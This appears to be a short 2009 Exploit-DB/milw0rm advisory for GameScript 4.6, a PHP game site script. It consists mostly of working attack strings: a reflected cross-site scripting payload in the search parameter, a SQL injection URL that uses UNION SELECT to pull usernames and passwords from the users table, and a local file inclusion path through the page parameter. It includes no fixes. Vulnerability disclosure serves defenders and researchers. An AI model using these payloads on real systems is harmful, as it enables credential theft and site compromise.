gamescript 4.6 - Cross-Site Scripting / SQL Injection / Local File Inclusion

EDB-ID:

7893

CVE:





Platform:

PHP

Date:

2009-01-28


GameScript 4.6 Multiple Vulnerabillities
(Earlier versions might be affected)

By : Encrypt3d.M!nd

Demo :www.gsdemo.com
just bored  :) 
There are other vulnerabillities i think

Iam Iraqian...Not Arabian
###################################################

Xss :

/games.php?search="<script>alert(666);</script>


Sql injection :

/page.php?page=viewprofile&user=-Encrypt3d'%20union%20select%201,2,username,4,5,password,7,8,9,10,11,12%20from%20users/*

Local File Include :

/page.php?page=file_to_include

# milw0rm.com [2009-01-28]